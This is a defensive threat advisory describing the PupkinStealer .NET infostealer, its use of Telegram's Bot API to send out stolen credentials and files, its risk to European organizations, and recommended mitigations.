PupkinStealer is a recently identified .NET-based information-stealing malware designed to exfiltrate sensitive user data by leveraging legitimate Telegram infrastructure for covert communication. The malware targets Chromium-based web browsers, Telegram, and Discord applications to harvest credentials such as saved passwords and session tokens, enabling attackers to hijack user sessions and gain unauthorized access to victim accounts. PupkinStealer performs minimal system reconnaissance, focusing instead on rapid data collection and exfiltration to reduce detection risk. It collects files from the desktop and captures screenshots, packaging all stolen data into a ZIP archive. This archive is then sent to the attacker via Telegram's Bot API, which serves as the command and control (C2) channel. Notably, PupkinStealer does not implement persistence mechanisms, indicating its operational model relies on quick execution and stealth rather than long-term presence on infected systems. Its primary evasion technique is the use of Telegram’s legitimate infrastructure, which can bypass traditional network security filters and evade detection by blending malicious traffic with normal application communications. The malware’s medium severity rating reflects its capability to compromise user credentials and sessions, potentially leading to broader account takeover and data breaches. No known exploits in the wild have been reported yet, but the malware’s use of common applications and communication channels makes it a credible threat, especially in environments where Chromium browsers and Telegram/Discord are widely used. The lack of patches or specific vulnerable versions suggests that the threat is application-agnostic and relies on social engineering or other infection vectors to execute.

For European organizations, PupkinStealer poses a significant risk primarily through credential theft and session hijacking, which can lead to unauthorized access to corporate and personal accounts. Given the widespread use of Chromium-based browsers and messaging platforms like Telegram and Discord across Europe, the malware can facilitate lateral movement within networks if stolen credentials grant access to internal systems or cloud services. The theft of session tokens is particularly concerning as it may bypass multi-factor authentication mechanisms, enabling attackers to impersonate users without triggering standard security alerts. The malware’s ability to collect desktop files and screenshots further increases the risk of sensitive data exposure, including intellectual property and confidential communications. Although PupkinStealer lacks persistence, its quick execution and stealthy communication via Telegram’s infrastructure make detection challenging, potentially allowing attackers to exfiltrate valuable data before remediation. European organizations with remote or hybrid workforces relying on these applications are especially vulnerable. Additionally, sectors with high-value targets such as finance, government, and critical infrastructure could face targeted attacks leveraging this malware to gain initial footholds or escalate privileges. The medium severity rating suggests that while the malware is not currently causing widespread disruption, its capabilities warrant proactive defense measures to prevent credential compromise and data leakage.

To mitigate the threat posed by PupkinStealer, European organizations should implement targeted controls beyond generic cybersecurity hygiene. First, enforce strict credential management policies including regular password changes and the use of password managers to reduce the risk of credential reuse and theft. Deploy endpoint detection and response (EDR) solutions capable of monitoring process behaviors and detecting unusual use of Telegram’s Bot API or unexpected ZIP file creation and transmission. Network monitoring should include anomaly detection for Telegram traffic patterns, especially outbound connections to Telegram Bot endpoints that deviate from normal user activity. Implement application whitelisting to restrict execution of unauthorized .NET binaries and scripts. Educate users on the risks of downloading and executing unknown files, particularly those purporting to be related to messaging or browser extensions. Employ multi-factor authentication (MFA) with adaptive risk-based policies to detect and block suspicious session hijacking attempts. Regularly audit desktop file shares and restrict access to sensitive files to minimize data exposure. Finally, maintain updated threat intelligence feeds and integrate indicators of compromise (IOCs), such as the provided file hashes, into security tools to enable rapid detection and response to PupkinStealer infections.